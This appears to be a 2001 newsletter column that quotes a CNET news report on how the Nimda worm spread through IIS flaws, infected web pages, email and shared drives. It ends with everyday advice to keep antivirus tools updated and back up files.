Life on the Internet has been quite "interesting" over the past three months. First there was Sircam in late July, then CodeRed in late August and then the Nimda worm, which struck in mid-September. A few weeks after the WTC tragedy, another worm (Vote) masquerading as an innocuous e-mail message has began to spread. Here is an excerpt from a September 21 article on CNET describing the workings of the Nimda worm.

The Nimda worm hit so quickly, peaking within 6 hours, and caused so much havoc that accurate analysis of the worm has been delayed. (note: almost half a million computers infected worldwide within a week’s time)

The latest information shows that the Nimda worm's extensive replacement of key files and programs on infected PCs and its use of Windows file sharing to spread across local area networks have made it difficult to clean out. For example, earlier in the week, antivirus software company Symantec originally classified removal of the Nimda worm as "easy," but 24 hours later it changed that evaluation.

Nimda, which is "admin" (short for administrator) spelled backwards, started spreading early Tuesday morning (18^th) and quickly infected PCs and servers across the Internet. Also known as "readme.exe" and "W32.Nimda", the worm is the first to use four different methods to infect not only PCs running Windows 95/98/Me and 2000, but also servers running Windows 2000 and Windows NT.

The Nimda worm spreads by four different routes. The worm originally spread quickly by scanning local networks and the Internet for Web servers running Microsoft's Internet Information Server (IIS) software that were vulnerable to one of two well-known flaws.

First, if the server had already been compromised by the Code Red II worm, then Nimda used that backdoor to copy itself to the server as a file named "admin.dll." For all other IIS servers, the program attempted to use the "Web server folder traversal" vulnerability discovered in October 2000 to copy the file "admin.dll" to the server. Once the file is copied to the computer, the worm executes it and infects the new victim. On such servers, the worm creates a "guest" account with administrative privileges, copies itself to any network drives, makes the C: drive publicly accessible, and appends a script to HTM, HTML and ASP files. These files will attempt to upload a copy of the worm to the computer of anyone who views a Web page hosted by the infected computer using a browser with JavaScript enabled. The worm also deletes the keys in the system registry that set the security preferences for the computer and also causes itself to be run at start-up.

The ability to infect others through viewing a Web page is the Nimda worm's second path of infection. The snippet of JavaScript added to each Web file on an infected server will cause the worm, renamed "readme.eml", to upload from the server to the surfer's computer. The worm will run automatically on PCs using unpatched versions of Microsoft's Internet Explorer 5.5 SP1 or earlier. On any browser with JavaScript enabled, the worm's script will cause the browser to try to upload the code but will first ask the PC user's permission.

PCs can also be infected through the worm's third mode of transmission: e-mail. On infected computers, the Nimda worm runs its own mail service and sends e-mail to addresses in the Windows address book as well as to those culled from the machine's browser cache, which stores elements of recently viewed Web pages. The e-mail appears to have an attached WAV file, but in reality it uses an old MIME (multipurpose Internet mail extensions) vulnerability to automatically run the worm once the e-mail is viewed in the mail client's preview panel. Even on computers that are not vulnerable to the security flaw, the attachment causes the MS Outlook and Outlook Express e-mail programs to open a dialog box asking the user for permission to open the file. If the worm infects a PC through either the Web browser or e-mail, Nimda acts much like it does on servers. In addition, the worm adds a "load.exe" file to the Windows System directory, appends itself to many .exe, .eml and Word document files, and replaces common applications such as WordPad, WinZip32 and HyperTerminal with a copy that executes the worm. In addition, the worm places copies of "Riched20.dll", the program that is the workhorse text editor for Word, WordPad and other editing programs, in multiple places on every accessible hard drive. Whenever a program that uses Riched20.dll opens, it also executes the worm.

This ability to spread copies of itself throughout corporate networks by using shared drives is the fourth way the worm infects. Using the network-sharing mechanism, the Nimda worm spreads fast and makes extermination very difficult, said Vincent Gullotto, director of security software maker Network Associates' antivirus emergency response team. "While you are cleaning one area of the network, it is coming back behind you and reinfecting the computers," he said.

Network Associates, Symantec and other security companies have tools to help system administrators clean their systems. Microsoft has posted an extensive list of patches and advisories to combat the worm.

Analyses of the Nimda worm can be found at CERT, SecurityFocus.com, Neohapsis and most antivirus companies' Web sites.

To avoid falling prey to these pernicious pests, install a good antivirus scanning program. Keep its "virus identifier data" updated, download a new version at least every other month (the oftener the better). And use it to scan your system regularly (upon system boot-up and every time you find unusual program activity). As they always say, "A gram of prevention is worth a kilogram of cure". The short time you spend on an antivirus scan will go a long way in protecting your valuable time, money and data.

Happy computing :- )

p.s. don't forget to backup important files